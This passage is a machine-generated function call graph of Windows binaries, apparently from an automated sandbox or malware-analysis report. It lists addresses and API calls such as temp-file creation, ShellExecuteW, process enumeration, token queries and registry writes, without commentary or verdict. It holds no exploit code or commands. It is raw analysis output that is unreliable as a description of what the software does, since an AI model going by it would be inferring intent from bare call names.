6c95d756 75998->75994 75999->75997 76001 6c49cc01 76000->76001 76002 6c49cc29 76000->76002 76003 6c49cc0b 76001->76003 76004 6c49cc30 76001->76004 76002->75988 76033 6c49d353 GetParent 76003->76033 76005 6c49cc3b 76004->76005 76006 6c49cd0f 76004->76006 76005->76002 76008 6c49cc49 76005->76008 76009 6c49cd47 76006->76009 76010 6c49cd16 76006->76010 76068 6c4a02e7 SendMessageW 76008->76068 76013 6c49cded 76009->76013 76014 6c49cd52 76009->76014 76012 6c49cc1b 76010->76012 76069 6c49d777 RaiseException SendMessageW 76010->76069 76012->76002 76027 6c49cf69 76012->76027 76018 6c49cdf4 76013->76018 76023 6c49ce29 76013->76023 76014->76002 76019 6c49cd64 76014->76019 76015 6c49cc6a 76015->76002 76020 6c49cceb 76015->76020 76028 6c49ccfa RaiseException 76015->76028 76071 6c49d5cc 116 API calls 2 library calls 76018->76071 76070 6c4a02e7 SendMessageW 76019->76070 76020->76002 76024 6c49cf4b 76023->76024 76023->76027 76024->76027 76072 6c49d5cc 116 API calls 2 library calls 76024->76072 76073 6c4a5cd1 GetDlgItem SendMessageW 76027->76073 76412 6c491003 76029->76412 76032->75998 76074 6c48e153 GetWindowLongW 76033->76074 76037 6c49d3b0 76119 6c49d073 76037->76119 76039 6c49d3b5 GetDlgItem 76135 6c490b11 76039->76135 76045 6c49d403 76212 6c49d2bf 76045->76212 76047 6c49d40a 76048 6c49d41c GetDlgItem KiUserCallbackDispatcher 76047->76048 76049 6c49d433 76047->76049 76048->76049 76222 6c496615 CreateWindowExW SetWindowPos 76049->76222 76051 6c49d448 76223 6c49e8e8 76051->76223 76053 6c49d457 GetDlgItem 76230 6c496655 76053->76230 76068->76015 76069->76012 76070->76015 76071->76023 76072->76027 76073->76020 76075 6c48e19f GetWindowRect 76074->76075 76076 6c48e182 76074->76076 76079 6c48e228 GetParent GetClientRect GetClientRect MapWindowPoints 76075->76079 76080 6c48e1b4 76075->76080 76077 6c48e189 GetParent 76076->76077 76078 6c48e193 GetWindow 76076->76078 76081 6c48e19d 76077->76081 76078->76081 76089 6c48e20f SetWindowPos 76079->76089 76082 6c48e1b8 GetWindowLongW 76080->76082 76083 6c48e1c4 MonitorFromWindow 76080->76083 76081->76075 76082->76083 76085 6c48e1eb GetMonitorInfoW 76083->76085 76086 6c48e1e4 76083->76086 76085->76086 76087 6c48e201 76085->76087 76090 6c4a87c1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 76086->76090 76087->76089 76091 6c48e21b GetWindowRect 76087->76091 76089->76086 76092 6c48e2da SetWindowTextW 76090->76092 76091->76089 76093 6c49d149 76092->76093 76094 6c49d155 __EH_prolog3 76093->76094 76095 6c49d2a9 ctype 76094->76095 76249 6c48c419 76094->76249 76095->76037 76097 6c49d173 76259 6c49f21d 76097->76259 76099 6c49d184 LoadImageW 76100 6c49d1b5 76099->76100 76101 6c49d1a4 SendMessageW 76099->76101 76264 6c49f25e 76100->76264 76101->76100 76103 6c49d1bd 76104 6c49f21d 67 API calls 76103->76104 76105 6c49d1d9 LoadImageW 76104->76105 76106 6c49d20f 76105->76106 76107 6c49d1f0 GetDlgItem SendMessageW 76105->76107 76108 6c49f25e 67 API calls 76106->76108 76107->76106 76109 6c49d217 76108->76109 76110 6c49f21d 67 API calls 76109->76110 76111 6c49d224 LoadImageW 76110->76111 76112 6c49d23d GetDlgItem SendMessageW 76111->76112 76113 6c49d25c 76111->76113 76112->76113 76114 6c49f25e 67 API calls 76113->76114 76115 6c49d264 76114->76115 76116 6c49f21d 67 API calls 76115->76116 76117 6c49d271 LoadImageW 76116->76117 76117->76095 76118 6c49d28a GetDlgItem SendMessageW 76117->76118 76118->76095 76120 6c49d07f __EH_prolog3 76119->76120 76121 6c49d09f 76120->76121 76122 6c49d0b3 76120->76122 76123 6c49e8e8 106 API calls 76121->76123 76124 6c49d0bf 76122->76124 76125 6c49d0f4 76122->76125 76129 6c49d0ad 76123->76129 76127 6c49e8e8 106 API calls 76124->76127 76126 6c49e8e8 106 API calls 76125->76126 76126->76129 76128 6c49d0c9 76127->76128 76274 6c4a5075 76128->76274 76278 6c49ea8d 76129->76278 76132 6c49d0ef ctype 76133 6c49d127 SetDlgItemTextW 76132->76133 76134 6c49d13e ctype 76133->76134 76134->76039 76136 6c490b1a 76135->76136 76334 6c48e2e1 76136->76334 76139 6c490b37 SendMessageW 76141 6c49d86c 76139->76141 76140 6c490b27 SetWindowLongW 76140->76139 76338 6c4a0324 SendMessageW 76141->76338 76143 6c49d8af _memset 76144 6c49d8bb SendMessageW 76143->76144 76145 6c49d99a 76144->76145 76146 6c49d900 76144->76146 76148 6c49da4a 76145->76148 76149 6c49d9a5 76145->76149 76147 6c49e8e8 106 API calls 76146->76147 76150 6c49d915 76147->76150 76152 6c49db06 76148->76152 76196 6c49da48 76148->76196 76151 6c49e8e8 106 API calls 76149->76151 76339 6c4a0353 SendMessageW GetWindowTextLengthW SendMessageW 76150->76339 76154 6c49d9ba 76151->76154 76153 6c4a87c1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 76152->76153 76156 6c49d3ed SendMessageW 76153->76156 76345 6c4a0353 SendMessageW GetWindowTextLengthW SendMessageW 76154->76345 76199 6c49cfa5 76156->76199 76157 6c49da64 76159 6c49e8e8 106 API calls 76157->76159 76162 6c49da79 76159->76162 76160 6c49d92c ctype 76340 6c4a0353 SendMessageW GetWindowTextLengthW SendMessageW 76160->76340 76353 6c4a0353 SendMessageW GetWindowTextLengthW SendMessageW 76162->76353 76163 6c49d9d1 ctype 76346 6c4a0353 SendMessageW GetWindowTextLengthW SendMessageW 76163->76346 76166 6c49da8f ctype 76354 6c4a0353 SendMessageW GetWindowTextLengthW SendMessageW 76166->76354 76167 6c49d94c 76341 6c490d3d 7 API calls 2 library calls 76167->76341 76170 6c49d9f1 76347 6c490d3d 7 API calls 2 library calls 76170->76347 76172 6c49d964 76342 6c490e35 7 API calls 2 library calls 76172->76342 76173 6c49da09 76348 6c490e35 7 API calls 2 library calls 76173->76348 76177 6c49daaf 76355 6c490d3d 7 API calls 2 library calls 76177->76355 76178 6c49d977 76343 6c490d3d 7 API calls 2 library calls 76178->76343 76180 6c49da1c 76349 6c490d3d 7 API calls 2 library calls 76180->76349 76182 6c49d983 76344 6c490e35 7 API calls 2 library calls 76182->76344 76184 6c49dac7 76356 6c490e35 7 API calls 2 library calls 76184->76356 76186 6c49da28 76350 6c490e35 7 API calls 2 library calls 76186->76350 76189 6c49dada 76357 6c490d3d 7 API calls 2 library calls 76189->76357 76191 6c49da37 76351 6c49dd4c 128 API calls ctype 76191->76351 76195 6c49dae6 76358 6c490e35 7 API calls 2 library calls 76195->76358 76196->76148 76352 6c4a0353 SendMessageW GetWindowTextLengthW SendMessageW 76196->76352 76198 6c49d992 76359 6c49dd4c 128 API calls ctype 76198->76359 76200 6c49cfb1 __EH_prolog3 76199->76200 76201 6c49e8e8 106 API calls 76200->76201 76202 6c49cfbf ctype 76201->76202 76203 6c4a5075 103 API calls 76202->76203 76204 6c49d010 GetDlgItem 76203->76204 76205 6c49d02c 76204->76205 76206 6c48e2e1 2 API calls 76205->76206 76207 6c49d034 76206->76207 76208 6c49d038 SetWindowLongW 76207->76208 76209 6c49d051 SetDlgItemTextW 76207->76209 76208->76209 76210 6c49d04b 76208->76210 76211 6c49d068 ctype 76209->76211 76210->76209 76211->76045 76213 6c49d2cb __EH_prolog3 76212->76213 76214 6c49e8e8 106 API calls 76213->76214 76215 6c49d2d9 SetDlgItemTextW 76214->76215 76217 6c49d30d ctype 76215->76217 76218 6c49e8e8 106 API calls 76217->76218 76219 6c49d31b SetDlgItemTextW 76218->76219 76221 6c49d348 ctype 76219->76221 76221->76047 76222->76051 76224 6c49e8f4 __EH_prolog3 76223->76224 76225 6c49e925 76224->76225 76226 6c49e919 76224->76226 76227 6c4a81b6 97 API calls 76225->76227 76360 6c49efa1 106 API calls 76226->76360 76229 6c49e923 ctype 76227->76229 76229->76053 76231 6c496661 __EH_prolog3_GS 76230->76231 76232 6c49e8e8 106 API calls 76231->76232 76233 6c496678 76232->76233 76361 6c49f35e 76233->76361 76235 6c496685 ctype 76236 6c49670a RaiseException 76235->76236 76237 6c4966a2 76235->76237 76238 6c4966b8 _memset 76237->76238 76368 6c4a81de 66 API calls 2 library calls 76237->76368 76240 6c4966c8 GetClientRect SendMessageW 76238->76240 76365 6c4b2722 76240->76365 76250 6c48c425 __EH_prolog3 76249->76250 76251 6c48c466 GetModuleFileNameW 76250->76251 76268 6c4a827a 66 API calls 76250->76268 76253 6c48c47e 76251->76253 76255 6c49e8e8 106 API calls 76253->76255 76254 6c48c463 76254->76251 76256 6c48c486 76255->76256 76257 6c49f25e 67 API calls 76256->76257 76258 6c48c491 ctype 76257->76258 76258->76097 76260 6c49f22e 76259->76260 76269 6c4a82d1 76260->76269 76263 6c49f251 76263->76099 76265 6c4a82d1 66 API calls 76264->76265 76266 6c49f26e PathRemoveFileSpecW 76265->76266 76267 6c49f27f 76266->76267 76267->76103 76268->76254 76270 6c4a82dc 76269->76270 76271 6c49f23d PathAppendW 76270->76271 76273 6c4a827a 66 API calls 76270->76273 76271->76263 76273->76271 76275 6c4a5081 76274->76275 76282 6c4a681a 76275->76282 76277 6c4a50a0 76277->76132 76279 6c49ea9c 76278->76279 76281 6c49eaa9 ctype 76278->76281 76280 6c4a811c 97 API calls 76279->76280 76279->76281 76280->76281 76281->76132 76291 6c4b265b 76282->76291 76284 6c4a6826 GetLastError SetLastError FormatMessageW GetLastError 76285 6c4a6860 76284->76285 76286 6c4a6865 SetLastError 76284->76286 76296 6c4a83ed 66 API calls _memcpy_s 76285->76296 76292 6c4a81b6 76286->76292 76290 6c4a6883 ctype 76290->76277 76291->76284 76293 6c4a81c4 76292->76293 76297 6c4a811c 76293->76297 76295 6c4a6875 LocalFree 76295->76290 76296->76286 76298 6c4a8129 76297->76298 76299 6c4a8130 76297->76299 76298->76295 76300 6c4a82d1 66 API calls 76299->76300 76301 6c4a8154 76300->76301 76302 6c4a815d 76301->76302 76303 6c4a8171 76301->76303 76308 6c4a8c1a 66 API calls 3 library calls 76302->76308 76309 6c4a8923 76303->76309 76306 6c4a816f 76318 6c4a830d 76306->76318 76308->76306 76312 6c4a8934 _memset 76309->76312 76313 6c4a8930 _memmove 76309->76313 76310 6c4a893a 76329 6c4ab570 66 API calls __getptd_noexit 76310->76329 76312->76310 76312->76313 76315 6c4a897f 76312->76315 76313->76306 76314 6c4a893f 76330 6c4ab514 11 API calls __wctomb_s_l 76314->76330 76315->76313 76331 6c4ab570 66 API calls __getptd_noexit 76315->76331 76319 6c4a8311 76318->76319 76320 6c4a8318 76319->76320 76322 6c4a8367 76319->76322 76332 6c4a8bf9 66 API calls _vwprintf 76319->76332 76320->76298 76323 6c4a82d1 66 API calls 76322->76323 76324 6c4a836d 76323->76324 76333 6c4a8b76 97 API calls swprintf 76324->76333 76326 6c4a837d 76327 6c4a830d 97 API calls 76326->76327 76328 6c4a8389 76327->76328 76328->76298 76329->76314 76330->76313 76331->76314 76332->76319 76333->76326 76335 6c48e2fb GetCurrentProcess FlushInstructionCache 76334->76335 76336 6c48e2ef 76334->76336 76337 6c48e329 76335->76337 76336->76335 76336->76337 76337->76139 76337->76140 76338->76143 76339->76160 76340->76167 76341->76172 76342->76178 76343->76182 76344->76198 76345->76163 76346->76170 76347->76173 76348->76180 76349->76186 76350->76191 76351->76196 76352->76157 76353->76166 76354->76177 76355->76184 76356->76189 76357->76195 76358->76198 76359->76152 76360->76229 76363 6c49f36a __EH_prolog3 76361->76363 76362 6c49f3ac ctype 76362->76235 76363->76362 76369 6c4a8eaa 76363->76369 76366 6c4a87c1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 76365->76366 76367 6c4b272c 76366->76367 76367->76367 76368->76238 76370 6c4a8eb9 76369->76370 76373 6c4a8ed4 76369->76373 76371 6c4a8ec5 76370->76371 76370->76373 76399 6c4ab570 66 API calls __getptd_noexit 76371->76399 76372 6c4a8ee9 76378 6c4ad763 76372->76378 76373->76372 76400 6c4aaf4e 67 API calls 2 library calls 76373->76400 76377 6c4a8eca _memset 76377->76362 76379 6c4ad779 76378->76379 76380 6c4ad76e 76378->76380 76382 6c4ad781 76379->76382 76390 6c4ad78e 76379->76390 76381 6c4a8fcb _malloc 66 API calls 76380->76381 76383 6c4ad776 76381->76383 76401 6c4a8e26 66 API calls 2 library calls 76382->76401 76383->76377 76385 6c4ad7c6 76403 6c4ada46 _DecodePointerInternal 76385->76403 76386 6c4ad796 HeapReAlloc 76386->76390 76398 6c4ad789 __dosmaperr 76386->76398 76388 6c4ad7cc 76404 6c4ab570 66 API calls __getptd_noexit 76388->76404 76389 6c4ad7f6 76406 6c4ab570 66 API calls __getptd_noexit 76389->76406 76390->76385 76390->76386 76390->76389 76395 6c4ad7de 76390->76395 76402 6c4ada46 _DecodePointerInternal 76390->76402 76394 6c4ad7fb GetLastError 76394->76398 76405 6c4ab570 66 API calls __getptd_noexit 76395->76405 76397 6c4ad7e3 GetLastError 76397->76398 76398->76377 76399->76377 76400->76372 76401->76398 76402->76390 76403->76388 76404->76398 76405->76397 76406->76394 76437 6c48f179 76412->76437 76415 6c49e8e8 106 API calls 76416 6c49106a ctype 76415->76416 76440 6c4a7acf 76416->76440 76420 6c49109d 76421 6c49e8e8 106 API calls 76420->76421 76425 6c4910e6 ctype 76421->76425 76422 6c491122 PathFileExistsW 76423 6c49112c 76422->76423 76422->76425 76456 6c4a7bec 76423->76456 76425->76422 76428 6c49e8e8 106 API calls 76425->76428 76426 6c491139 ctype 76427 6c49115c ShellExecuteW 76426->76427 76468 6c4a81de 66 API calls 2 library calls 76426->76468 76466 6c4a8460 76427->76466 76428->76422 76431 6c491158 76431->76427 76432 6c49117c 76469 6c4a7c57 CloseHandle DeleteFileW CloseHandle 76432->76469 76434 6c491185 ctype 76435 6c4a87c1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 76434->76435 76436 6c4911b1 76435->76436 76436->75988 76470 6c4a5584 76437->76470 76439 6c48f18b 76439->76415 76441 6c4a7b1e 76440->76441 76442 6c4a7aef GetTempPathW 76440->76442 76443 6c4a9064 __NMSG_WRITE 66 API calls 76441->76443 76444 6c4a7b06 76442->76444 76450 6c4a7b10 76442->76450 76443->76450 76614 6c4a7f08 GetLastError 76444->76614 76446 6c4a7b3f GetTempFileNameW 76446->76444 76448 6c4a7b5e 76446->76448 76447 6c4a7b0b 76449 6c4a87c1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 76447->76449 76597 6c4a9064 76448->76597 76452 6c491093 76449->76452 76450->76446 76450->76447 76455 6c490eca SendMessageW 76452->76455 76453 6c4a7b7e 76606 6c4a7f22 76453->76606 76455->76420 76457 6c4a7bfa FindCloseChangeNotification 76456->76457 76458 6c4a7c04 76456->76458 76457->76458 76459 6c4a7c0a DeleteFileW 76458->76459 76460 6c4a7c1b DeleteFileW 76458->76460 76465 6c4a7c14 76459->76465 76461 6c4a7c3a MoveFileW 76460->76461 76462 6c4a7c28 GetLastError 76460->76462 76463 6c4a7c4b 76461->76463 76461->76465 76462->76461 76462->76465 76620 6c4a7f08 GetLastError 76463->76620 76465->76426 76467 6c4a846f 76466->76467 76467->76432 76468->76431 76469->76434 76508 6c4b265b 76470->76508 76472 6c4a5590 GetCurrentProcessId 76509 6c48f197 76472->76509 76474 6c4a55ae ctype 76512 6c48efe2 CreateToolhelp32Snapshot 76474->76512 76477 6c48f197 109 API calls 76478 6c4a5609 ctype 76477->76478 76522 6c49eb56 76478->76522 76481 6c4a56a7 76495 6c4a57fb ctype 76481->76495 76526 6c48f07e 76481->76526 76482 6c48efe2 9 API calls 76483 6c4a5642 76482->76483 76485 6c48f07e 106 API calls 76483->76485 76488 6c4a564c 76485->76488 76486 6c4a56bb 76489 6c49ea8d 97 API calls 76486->76489 76487 6c48f0c8 99 API calls 76487->76481 76490 6c49ea8d 97 API calls 76488->76490 76493 6c4a56db ctype 76489->76493 76491 6c4a566c ctype 76490->76491 76491->76481 76491->76487 76492 6c4a5716 76494 6c48f07e 106 API calls 76492->76494 76492->76495 76493->76492 76529 6c48f0c8 76493->76529 76496 6c4a572a 76494->76496 76495->76439 76498 6c49ea8d 97 API calls 76496->76498 76499 6c4a574a ctype 76498->76499 76501 6c4a5785 76499->76501 76503 6c48f0c8 99 API calls 76499->76503 76500 6c4a57ab GetTempPathW 76504 6c4a57be 76500->76504 76501->76495 76501->76500 76539 6c4a827a 66 API calls 76501->76539 76503->76501 76504->76495 76505 6c48f0c8 99 API calls 76504->76505 76506 6c4a57e2 76505->76506 76506->76495 76540 6c4a827a 66 API calls 76506->76540 76508->76472 76541 6c4a5848 76509->76541 76511 6c48f1ca 76511->76474 76513 6c48f00b _memset 76512->76513 76514 6c48f067 76512->76514 76517 6c48f01d Process32FirstW 76513->76517 76515 6c4a87c1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 76514->76515 76516 6c48f075 76515->76516 76516->76477 76518 6c48f03a 76517->76518 76519 6c48f058 FindCloseChangeNotification 76518->76519 76520 6c48f045 Process32NextW 76518->76520 76519->76514 76520->76518 76523 6c49eb61 76522->76523 76575 6c4a9669 76523->76575 76586 6c4a54b3 76526->76586 76528 6c48f0ab 76528->76486 76530 6c48f0d4 __EH_prolog3 76529->76530 76531 6c4a811c 97 API calls 76530->76531 76532 6c48f106 76531->76532 76533 6c48f123 76532->76533 76596 6c4a827a 66 API calls 76532->76596 76595 6c48f0b7 GetTempFileNameW 76533->76595 76539->76500 76540->76495 76544 6c4a5854 __EH_prolog3 76541->76544 76542 6c4a599f 76557 6c49f0e8 76542->76557 76544->76542 76546 6c4a58ae GetTokenInformation 76544->76546 76545 6c4a59b6 76561 6c49f092 76545->76561 76548 6c4a5999 FindCloseChangeNotification 76546->76548 76555 6c4a58c7 _strnlen 76546->76555 76548->76542 76549 6c4a59c9 ctype 76550 6c49e8e8 106 API calls 76549->76550 76556 6c4a59e3 ctype 76549->76556 76550->76556 76551 6c4a5912 GetTokenInformation 76551->76555 76553 6c4a82d1 66 API calls 76553->76555 76554 6c4a5987 ctype 76554->76548 76555->76548 76555->76551 76555->76553 76555->76554 76565 6c4a79b9 66 API calls 76555->76565 76556->76511 76558 6c49f0f4 __EH_prolog3 76557->76558 76566 6c4a38c5 76558->76566 76560 6c49f130 ctype 76560->76545 76562 6c49f09e __EH_prolog3 76561->76562 76563 6c4a38c5 97 API calls 76562->76563 76564 6c49f0d6 ctype 76563->76564 76564->76549 76565->76555 76567 6c4a82d1 66 API calls 76566->76567 76568 6c4a38df 76567->76568 76569 6c4a8923 _memcpy_s 66 API calls 76568->76569 76570 6c4a38f0 76569->76570 76571 6c4a8923 _memcpy_s 66 API calls 76570->76571 76572 6c4a3900 76571->76572 76573 6c4a830d 97 API calls 76572->76573 76574 6c4a390e 76573->76574 76574->76560 76576 6c4a9678 76575->76576 76577 6c4a96e1 76575->76577 76582 6c49eb79 76576->76582 76583 6c4ab570 66 API calls __getptd_noexit 76576->76583 76585 6c4a9561 78 API calls 4 library calls 76577->76585 76580 6c4a9684 76584 6c4ab514 11 API calls __wctomb_s_l 76580->76584 76582->76482 76582->76491 76583->76580 76584->76582 76585->76582 76588 6c4a54bf __EH_prolog3 76586->76588 76587 6c49e8e8 106 API calls 76590 6c4a556c ctype 76587->76590 76591 6c4a5519 76588->76591 76593 6c4a5553 76588->76593 76594 6c4a827a 66 API calls 76588->76594 76590->76528 76592 6c4a811c 97 API calls 76591->76592 76591->76593 76592->76593 76593->76587 76594->76591 76596->76533 76601 6c4a9076 76597->76601 76598 6c4a907a 76600 6c4a907f 76598->76600 76615 6c4ab570 66 API calls __getptd_noexit 76598->76615 76600->76453 76601->76598 76601->76600 76603 6c4a90bd 76601->76603 76603->76600 76617 6c4ab570 66 API calls __getptd_noexit 76603->76617 76605 6c4a9096 76616 6c4ab514 11 API calls __wctomb_s_l 76605->76616 76607 6c4a7f48 CreateFileW 76606->76607 76608 6c4a7f2f 76606->76608 76610 6c4a7f62 76607->76610 76618 6c4a7e95 GetModuleHandleW GetProcAddress CreateFileW 76608->76618 76611 6c4a7f6d 76610->76611 76619 6c4a7f08 GetLastError 76610->76619 76611->76447 76612 6c4a7f46 76612->76610 76614->76447 76615->76605 76616->76600 76617->76605 76618->76612 76619->76611 76620->76465 76621 6c490eac 76624 6c4911ba 76621->76624 76625 6c4911c9 76624->76625 76626 6c4911cc WriteFile 76624->76626 76625->76626 76627 6c4911e2 76626->76627 76628 6c4911e7 FlushFileBuffers 76626->76628 76633 6c4a7f08 GetLastError 76627->76633 76630 6c490ec1 76628->76630 76631 6c4911f5 76628->76631 76634 6c4a7f08 GetLastError 76631->76634 76633->76628 76634->76630 76635 32a24 76682 33db0 76635->76682 76637 32a30 GetStartupInfoW 76638 32a44 HeapSetInformation 76637->76638 76641 32a4f 76637->76641 76638->76641 76640 32a9d 76642 32aa8 76640->76642 76707 329f6 66 API calls 3 library calls 76640->76707 76683 33d83 HeapCreate 76641->76683 76708 33c03 86 API calls 4 library calls 76642->76708 76645 32aae 76646 32ab2 76645->76646 76647 32aba __RTC_Initialize 76645->76647 76709 329f6 66 API calls 3 library calls 76646->76709 76684 33642 73 API calls __calloc_crt 76647->76684 76649 32ab9 76649->76647 76651 32ac7 76652 32ad3 GetCommandLineW 76651->76652 76653 32acb 76651->76653 76685 335e5 GetEnvironmentStringsW 76652->76685 76710 32f1c 66 API calls 3 library calls 76653->76710 76657 32ae3 76711 33532 67 API calls 2 library calls 76657->76711 76659 32aed 76660 32af1 76659->76660 76661 32af9 76659->76661 76712 32f1c 66 API calls 3 library calls 76660->76712 76691 332f6 76661->76691 76665 32afe 76666 32b02 76665->76666 76667 32b0a 76665->76667 76713 32f1c 66 API calls 3 library calls 76666->76713 76705 32cdd 77 API calls 4 library calls 76667->76705 76671 32b11 76672 32b16 76671->76672 76673 32b1d __wwincmdln 76671->76673 76714 32f1c 66 API calls 3 library calls 76672->76714 76675 32b1c 76673->76675 76706 32915 HeapSetInformation Run 76673->76706 76675->76673 76677 32b3e 76678 32b4c 76677->76678 76715 32ebe 66 API calls _doexit 76677->76715 76716 32ef4 66 API calls _doexit 76678->76716 76681 32b51 _raise 76682->76637 76683->76640 76684->76651 76686 335f6 76685->76686 76687 335fa 76685->76687 76686->76657 76717 34f38 76687->76717 76689 33623 FreeEnvironmentStringsW 76689->76657 76690 3361c _memmove 76690->76689 76692 3330e _wcslen 76691->76692 76696 33306 76691->76696 76748 34f82 76692->76748 76694 33388 76755 34ef9 66 API calls 2 library calls 76694->76755 76696->76665 76697 34f82 __calloc_crt 66 API calls 76699 33332 _wcslen 76697->76699 76698 333ae 76756 34ef9 66 API calls 2 library calls 76698->76756 76699->76694 76699->76696 76699->76697 76699->76698 76702 333c5 76699->76702 76754 34e4d 66 API calls _raise 76699->76754 76757 346ec 10 API calls __call_reportfault 76702->76757 76704 333d1 76704->76665 76705->76671 76706->76677 76707->76642 76708->76645 76709->76649 76711->76659 76715->76678 76716->76681 76719 34f41 76717->76719 76720 34f77 76719->76720 76721 34f58 Sleep 76719->76721 76723 36115 76719->76723 76720->76690 76722 34f6d 76721->76722 76722->76719 76722->76720 76724 36192 76723->76724 76732 36123 76723->76732 76746 34771 _DecodePointerInternal 76724->76746 76726 36198 76747 347e5 66 API calls __getptd_noexit 76726->76747 76729 36151 RtlAllocateHeap 76730 3618a 76729->76730 76729->76732 76730->76719 76732->76729 76733 3617e 76732->76733 76734 3612e 76732->76734 76738 3617c 76732->76738 76743 34771 _DecodePointerInternal 76732->76743 76744 347e5 66 API calls __getptd_noexit 76733->76744 76734->76732 76740 3311e 66 API calls 2 library calls 76734->76740 76741 32f6a 66 API calls 6 library calls 76734->76741 76742 32c43 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 76734->76742 76745 347e5 66 API calls __getptd_noexit 76738->76745 76740->76734 76741->76734 76743->76732 76744->76738 76745->76730 76746->76726 76747->76730 76750 34f8b 76748->76750 76751 34fc8 76750->76751 76752 34fa9 Sleep 76750->76752 76758 361ae 76750->76758 76751->76699 76753 34fbe 76752->76753 76753->76750 76753->76751 76754->76699 76755->76696 76756->76696 76757->76704 76759 361d5 76758->76759 76760 361ba 76758->76760 76763 361e8 RtlAllocateHeap 76759->76763 76765 3620f 76759->76765 76768 34771 _DecodePointerInternal 76759->76768 76760->76759 76761 361c6 76760->76761 76767 347e5 66 API calls __getptd_noexit 76761->76767 76763->76759 76763->76765 76764 361cb 76764->76750 76765->76750 76767->76764 76768->76759 76769 6c94830c 76776 6c94f821 76769->76776 76832 6c9476a7 76776->76832 76833 6c9476b3 __EH_prolog3 76832->76833 76866 6c96c0aa 76833->76866 76836 6c947716 76886 6c9177af RegOpenKeyExW 76836->76886 76840 6c96c0aa ctype 77 API calls 76841 6c94772f GetModuleHandleW 76840->76841 76843 6c947752 GetProcAddress 76841->76843 76844 6c94776f SetUnhandledExceptionFilter GetCommandLineW 76841->76844 76843->76844 76845 6c947769 SetThreadStackGuarantee 76843->76845 76894 6c913e77 76844->76894 76845->76844 76847 6c94778a 77006 6c959293 GetCommandLineW 76847->77006 76853 6c9477c5 77074 6c9141d6 76853->77074 76868 6c96c0b4 76866->76868 76867 6c96bfb3 _malloc 66 API calls 76867->76868 76868->76867 76869 6c947704 76868->76869 76874 6c96c0d0 std::exception::exception 76868->76874 77082 6c971247 _DecodePointerInternal 76868->77082 76869->76836 76878 6c917c6e 76869->76878 76871 6c96c10e 77084 6c9713ee 66 API calls std::exception::operator= 76871->77084 76873 6c96c118 77085 6c9714aa 76873->77085 76874->76871 77083 6c96b1d7 76 API calls __cinit 76874->77083 76877 6c96c129 76879 6c917c7a __EH_prolog3 76878->76879 77088 6c968e54 76879->77088 76882 6c968e54 ctype KiUserExceptionDispatcher 76883 6c917cba 76882->76883 77092 6c917ce8 76883->77092 76885 6c917cd9 ctype 76885->76836 76887 6c9177f2 RegCreateKeyExW 76886->76887 76888 6c91785b RegCloseKey 76886->76888 76887->76888 76889 6c91780f 76887->76889 76890 6c96b091 ___strgtold12_l 5 API calls 76888->76890 77314 6c91787b 76889->77314 76891 6c917874 76890->76891 76891->76840 76893 6c91781a RegSetValueExW RegSetValueExW 76893->76888 76895 6c913e83 __EH_prolog3 76894->76895 76896 6c94833e ctype 110 API calls 76895->76896 76897 6c913e9f 76896->76897 76898 6c91419a ctype 76897->76898 76899 6c94833e ctype 110 API calls 76897->76899 76898->76847 76900 6c913eca 76899->76900 77390 6c949067 76900->77390 76902 6c913ed6 76903 6c968f0e ctype RtlFreeHeap 76902->76903 76904 6c913ee5 76903->76904 76905 6c94833e ctype 110 API calls 76904->76905 76906 6c913ef3 76905->76906 76907 6c949067 ctype 71 API calls 76906->76907 76908 6c913eff 76907->76908 76909 6c968f0e ctype RtlFreeHeap 76908->76909 76910 6c913f0e 76909->76910 76911 6c94833e ctype 110 API calls 76910->76911 76912 6c913f1c 76911->76912 76913 6c949067 ctype 71 API calls 76912->76913 76914 6c913f28 76913->76914 76915 6c968f0e ctype RtlFreeHeap 76914->76915 76916 6c913f37 76915->76916 76917 6c94833e ctype 110 API calls 76916->76917 76918 6c913f45 76917->76918 76919 6c949067 ctype 71 API calls 76918->76919 76920 6c913f51 76919->76920 76921 6c968f0e ctype RtlFreeHeap 76920->76921 76922 6c913f60 76921->76922 76923 6c94833e ctype 110 API calls 76922->76923 76924 6c913f6e 76923->76924 76925 6c949067 ctype 71 API calls 76924->76925 76926 6c913f7a 76925->76926 76927 6c968f0e ctype RtlFreeHeap 76926->76927 76928 6c913f89 76927->76928 76929 6c94833e ctype 110 API calls 76928->76929 76930 6c913f97 76929->76930 76931 6c949067 ctype 71 API calls 76930->76931 76932 6c913fa3 76931->76932 76933 6c968f0e ctype RtlFreeHeap 76932->76933 76934 6c913fb2 76933->76934 76935 6c94833e ctype 110 API calls 76934->76935 76936 6c913fc0 76935->76936 76937 6c949067 ctype 71 API calls 76936->76937 76938 6c913fcc 76937->76938 76939 6c968f0e ctype RtlFreeHeap 76938->76939 76940 6c913fdb 76939->76940 76941 6c94833e ctype 110 API calls 76940->76941 76942 6c913fe9 76941->76942 76943 6c949067 ctype 71 API calls 76942->76943 76944 6c913ff5 76943->76944 76945 6c968f0e ctype RtlFreeHeap 76944->76945 76946 6c914004 76945->76946 76947 6c94833e ctype 110 API calls 76946->76947 76948 6c914012 76947->76948 76949 6c949067 ctype 71 API calls 76948->76949 76950 6c91401e 76949->76950 76951 6c968f0e ctype RtlFreeHeap 76950->76951 76952 6c91402d 76951->76952 76953 6c94833e ctype 110 API calls 76952->76953 76954 6c91403b 76953->76954 76955 6c949067 ctype 71 API calls 76954->76955 76956 6c914047 76955->76956 76957 6c968f0e ctype RtlFreeHeap 76956->76957 76958 6c914056 76957->76958 76959 6c94833e ctype 110 API calls 76958->76959 76960 6c914064 76959->76960 76961 6c949067 ctype 71 API calls 76960->76961 76962 6c914070 76961->76962 76963 6c968f0e ctype RtlFreeHeap 76962->76963 76964 6c91407f 76963->76964 76965 6c94833e ctype 110 API calls 76964->76965 76966 6c91408d 76965->76966 76967 6c949067 ctype 71 API 